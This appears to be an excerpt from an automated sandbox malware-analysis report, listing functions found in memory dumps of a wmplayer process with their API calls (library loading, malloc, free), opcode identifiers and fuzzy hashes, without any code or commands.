                                                                                                                • API String ID: 1252446317-0
                                                                                                                • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                • Instruction ID: c5e0a20d0edc42953cedc9ecfad27687b4d456dc8fbb8de81df0544ad96008f0
                                                                                                                • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                • Instruction Fuzzy Hash: C2E04F309049054BEFD8D62DC8097503AE0FB5C306F604679D505C9295CB39989BCF81
                                                                                                                Function 000002075879698C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction ID: 7207dd3b0706b60623342577e69ca12830c28f98b88475a225109dffa54cebe0
                                                                                                                • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction Fuzzy Hash: 32D0A710724E0D0BEAC8637D1C9976515C6E7DC221FA0153EB80AC2282D954CC950300
                                                                                                                Function 000002075879A7E0 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                • Instruction ID: 6362029fb83cc4d45d417c9ff9fb368ec91fa59e6ac1698af0f2d2a487f44730
                                                                                                                • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                • Instruction Fuzzy Hash: DA418731718E0E9FDB85EF6CD88CEA5B7E0FB68311B51466AD409C3A55DB30E8958BC0
                                                                                                                Function 000002075879AA34 Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                • Instruction ID: 9c26087220b9336d4f5086ba2f89647f629ef6a297271725563c384d6fb0f633
                                                                                                                • Opcode Fuzzy Hash: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                • Instruction Fuzzy Hash: 9121C031614E0C8FDB49EF1CD88C7A177E5EBA831271446ABD809CB266DA34E8848B80
                                                                                                                Function 00000207587ADBCC Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                • Instruction ID: 4959337c6d2c851f6ec11158096537ff91e4b8cff02146cc3eb10c119778b9db
                                                                                                                • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                • Instruction Fuzzy Hash: 7B11C430604A198FFFB49FA988883B43AD0EB5C355FA4017AEC09DE186CF709C40C791
                                                                                                                Function 00007DF424A2063C Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2629687156.00007DF424A11000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A11000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_7df424a11000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                • Instruction ID: 45943b28f8652ee60c37c5c1814838c7af0e7b492dc568bfe5fdb94cf23553bd
                                                                                                                • Opcode Fuzzy Hash: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                • Instruction Fuzzy Hash: D111C4307089098FFF65DF68888576632E0EF95311F14027BE90ECA5AACF749E44DB90
                                                                                                                Function 000002075879A9D4 Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                • Instruction ID: 0f4c69168b078cd19b31f17740f6cdfdfd060c691b3070d910bf48f93d146b26
                                                                                                                • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                • Instruction Fuzzy Hash: B2F01D70615E0B4FEBC4EF69C498760B7E4FB6C315FB405699409C2991D7759C54C701
                                                                                                                Function 00000207587D4C3C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                • Instruction ID: 77827b67122702aa0780022644c9784eec03b5b7b92fbd477f38b117f7c443da
                                                                                                                • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                • Instruction Fuzzy Hash: E9F06D60615E0A4FEFD4EBA9C898F6537D4EB5C350FA01654980ACA696DB22EC82CB40
                                                                                                                Function 000002075879A988 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 2f652b0d7883f7cf47f9676453b13c48abc06a6e5056f5221c41d050729b2498
                                                                                                                • Instruction ID: 6a2ff0e8ac01c8d1759699f706c53b431304cc53f408d99989212f94b68b8466
                                                                                                                • Opcode Fuzzy Hash: 2f652b0d7883f7cf47f9676453b13c48abc06a6e5056f5221c41d050729b2498
                                                                                                                • Instruction Fuzzy Hash: CEE0B634A16F198BEF89AB78C94879076D1F738314FA909588415C29D1D678D484C744